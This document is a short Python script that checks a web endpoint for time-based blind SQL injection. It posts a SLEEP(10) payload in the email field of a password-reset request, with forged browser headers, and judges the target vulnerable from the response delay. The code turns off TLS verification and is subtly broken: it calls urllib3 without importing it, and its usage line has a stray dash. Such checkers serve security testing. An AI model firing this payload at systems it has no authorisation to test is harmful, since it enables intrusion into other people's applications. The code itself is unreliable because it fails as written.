#!/usr/bin/python

#usage
#python3 V-24-02-001_SQLi_Check.py –-url https://domain.com

import requests
import time
import uuid
import argparse

# Disable TLS warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_vulnerability(url, data, headers):
    print("[+] Checking endpoint!")

    # Get time of request
    start_time = time.time()
    response = requests.post(url, data=data, headers=headers, verify=False)

    # Get time of response 
    end_time = time.time()

    # Obtain actual response time
    response_time = end_time - start_time

    # Response time should be at least equal to our deliberate delay
    if response_time > 9:
        print("[+] VULNERABLE")
    else:
        print("[-] NOT VULNERABLE")

def main():
    parser = argparse.ArgumentParser(description='Check if an endpoint is vulnerable to a SQL injection attack.')
    parser.add_argument('--url', required=True, help='URL of the endpoint to check')
    args = parser.parse_args()

    url = args.url

    # 10 second deliberate delay
    data = "data%5Bemail%[email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'%3d'abcd"

    # Headers for request
    headers = {
        "Cookie": f"pma_lang=en; PHPSESSID={uuid.uuid4().hex}", # Generating a random PHPSESSID
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36",
        "Origin": url,
        "Referer": f"{url}/auth/password-reset-token.php",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }

    # Call the function
    check_vulnerability(url, data, headers)

if __name__ == "__main__":
    main()